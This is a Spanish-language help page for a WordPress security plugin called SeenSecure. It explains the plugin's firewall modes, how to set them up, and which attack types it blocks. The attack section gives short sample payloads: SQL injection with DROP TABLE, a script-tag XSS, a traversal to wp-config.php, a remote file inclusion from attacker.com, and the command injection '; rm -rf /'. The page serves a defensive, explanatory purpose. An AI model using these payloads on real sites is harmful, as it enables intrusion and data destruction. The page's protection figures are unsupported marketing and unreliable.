SeenSecure Help

Firewall: Tu Primera Línea de Defensa

Protección automática contra ataques, intrusiones y acceso no autorizado en tiempo real

Firewall: La Puerta de Entrada Protegida

Un firewall es como un guardia en la entrada de tu sitio. Examina cada visitante (solicitud HTTP) antes de permitir entrar:

  • ¿De dónde vienes? (IP)
  • ¿Qué intentas hacer? (URL, tipo de request)
  • ¿Cómo te comportas? (patrón de acceso)

Basándose en estas preguntas, el firewall decide: permitir, desafiar (CAPTCHA), o bloquear.

Analogía: Si Rate Limiting es "no dejar entrar a gente que toca mucho la puerta", el Firewall es "no dejar entrar a gente con intención criminal".

Selección de Modo

El Firewall ofrece diferentes modos de operación según tus necesidades de seguridad. Cada modo determina cuándo el firewall bloquea tráfico y cuándo permite el acceso.

¿Cómo Elegir el Modo Adecuado?

La selección del modo depende de tu situación específica:

  • Recién instalado: Comienza en Monitoring para observar
  • En producción: Protection es el modo estándar
  • En crisis: Strict para máxima protección
  • En desarrollo: Off para no afectar trabajo

Proceso Recomendado

  1. OFF → MONITOR: Primeros días para aprender
  2. MONITOR → LEARNING: Una semana para adaptar
  3. LEARNING → PROTECTION: Modo estándar permanente
  4. PROTECTION → STRICT: Solo si es necesario
Consejo: No saltes directamente a Protection. El tiempo en Monitoring/Learning ayuda a evitar falsos positivos.

Modos de Operación del Firewall

El Firewall tiene diferentes "modos" según tu necesidad. Cada modo cambia cuándo bloquea.

1. Modo OFF (Desactivado)

Qué hace: Nada. Firewall no está activo.

Cuándo usar: Nunca en producción. Solo durante desarrollo inicial.

Riesgo: Sin firewall, sitio es vulnerable a todos los ataques básicos.

2. Modo MONITOR (Observar)

Qué hace: Registra actividad sospechosa pero NO bloquea. Solo vigila.

Comportamiento: Todos acceden, pero firewall registra "esto sería bloqueado si..."

Cuándo usar:

  • Primeros días después de instalar SeenSecure
  • Para aprender qué es normal vs sospechoso en tu sitio
  • Antes de cambiar a modo más agresivo
Recomendación: Empieza aquí. Revisa logs 48-72 horas. Si no ves falsos positivos, sube a Learning.

3. Modo LEARNING (Aprender)

Qué hace: Firewall aprende qué es normal en tu sitio, bloquea solo obviamente malicioso.

Comportamiento: 95% del tráfico legítimo pasa. Solo bloquea SQL Injection, XSS, Path Traversal claros.

Cuándo usar: Después de Monitor, cuando confías en instalación.

Duración: Al menos 1 semana en este modo.

Ideal para: Sitios nuevos, migración, o cuando hay muchos usuarios desconocidos.

4. Modo PROTECTION (Protección Normal)

Qué hace: Balance: bloquea real attacks pero permite tráfico legítimo.

Comportamiento: Ataca bloqueados, tráfico normal pasa.

Cuándo usar: Sitios en producción normal. Defensa estándar.

Estadística: Protege contra 99% de ataques comunes en modo Protection.

5. Modo STRICT (Estricto)

Qué hace: Máxima protección. Bloquea cualquier cosa ligeramente sospechosa.

Comportamiento: Puede haber falsos positivos (usuarios legítimos bloqueados).

Cuándo usar:

  • Sitio bajo ataque activo
  • Sitio muy crítico (banking, healthcare)
  • Después de haber sido hackeado
Advertencia: Modo Strict puede bloquear usuarios legítimos. Requiere monitoreo constante.

OFF

❌ No usar en producción

MONITOR

✓ Primeros días

LEARNING

✓ Semana 1-4

PROTECTION

✓ Estándar recomendado

STRICT

✓ Solo en crisis

¿Qué Protege el Firewall?

SQL Injection (SQLi)

Ataque donde atacante inyecta código SQL para acceder a base de datos.

Ejemplo: Envía: "; DROP TABLE users; --

Defensa: Firewall detecta patrón, bloquea antes de llegar a BD.

Cross-Site Scripting (XSS)

Inyección de JavaScript malicioso que se ejecuta en navegador de usuarios.

Ejemplo: Envía: <script>alert('Hackeado')</script>

Defensa: Detecta tags maliciosos, limpia antes de mostrar.

Path Traversal

Intento de acceder archivos fuera de directorio permitido.

Ejemplo: URL: /../../wp-config.php

Defensa: Bloquea ".." y acceso a paths sensibles.

Remote File Inclusion (RFI)

Carga archivos maliciosos desde servidores externos.

Ejemplo: ?file=http://attacker.com/malware.php

Defensa: Bloquea URLs externas en parámetros.

Local File Inclusion (LFI)

Lee archivos locales del servidor.

Defensa: Valida parámetros de archivos.

Directory Listing

Acceso a carpetas sin index.html, permitiendo ver contenido.

Defensa: Bloquea enumeración de directorios.

Command Injection

Inyección de comandos del sistema operativo.

Ejemplo: ; rm -rf /

Defensa: Bloquea caracteres especiales de comandos.

XML External Entity (XXE)

Ataque contra procesadores XML.

Defensa: Deshabilita entidades externas.

Tipo de Ataque Severidad Modo para Bloquear
SQL Injection ⭐⭐⭐⭐⭐ Monitor+
XSS ⭐⭐⭐⭐ Monitor+
Path Traversal ⭐⭐⭐ Learning+
RFI/LFI ⭐⭐⭐⭐ Monitor+

Cómo Activar y Configurar el Firewall

Paso 1: Activar Firewall

SeenSecure > Firewall > Estado: Habilitar

Paso 2: Seleccionar Modo

SeenSecure > Firewall > Modo: [OFF | MONITOR | LEARNING | PROTECTION | STRICT]

Recomendación: Comienza con MONITOR durante 48 horas.

Paso 3: Revisar Logs

SeenSecure > Monitoreo > Firewall Activity

¿Ves muchos falsos positivos? ¿Usuarios legítimos bloqueados? Ajusta settings.

Paso 4: Configurar Sensibilidad

  • Agresividad: Qué tan fácil bloquea (0-100%)
  • Modo Query String: Cómo analiza parámetros URL
  • Modo POST Body: Cómo analiza datos POST

Paso 5: Definir Exclusiones (Opcional)

Si hay requests que Firewall bloquea incorrectamente:

  • Whitelist URL específica
  • Whitelist parámetro específico

Paso 6: Escalar a Modo Production

  • Día 1-3: MONITOR
  • Día 4-7: LEARNING
  • Semana 2+: PROTECTION (recomendado permanente)

Mejores Prácticas

Activación Gradual

  1. Instala SeenSecure
  2. Firewall OFF durante 1 día (validar funcionalidad)
  3. Firewall MONITOR durante 2-3 días
  4. Firewall LEARNING durante 1 semana
  5. Firewall PROTECTION indefinidamente

Monitoreo Continuo

  • Revisa logs 2-3 veces por semana inicialmente
  • Después, 1 vez por semana
  • Si ves patrón nuevo, investiga

Ajustes Según Tipo de Sitio

  • Blog Simple: PROTECTION con sensibilidad media
  • E-commerce: PROTECTION con sensibilidad alta en /checkout
  • SaaS: PROTECTION con sensibilidad muy alta
  • Crítico: STRICT durante horario de operación

Comunicación a Usuarios

Si Firewall bloquea usuario legítimo:

  1. Recibe mensaje de error descriptivo
  2. Explica que fue bloqueado por seguridad
  3. Ofrece contacto de soporte
Conclusión: Firewall + Login Security + 2FA + Rate Limiting = Defensa multicapa prácticamente impenetrable para WordPress.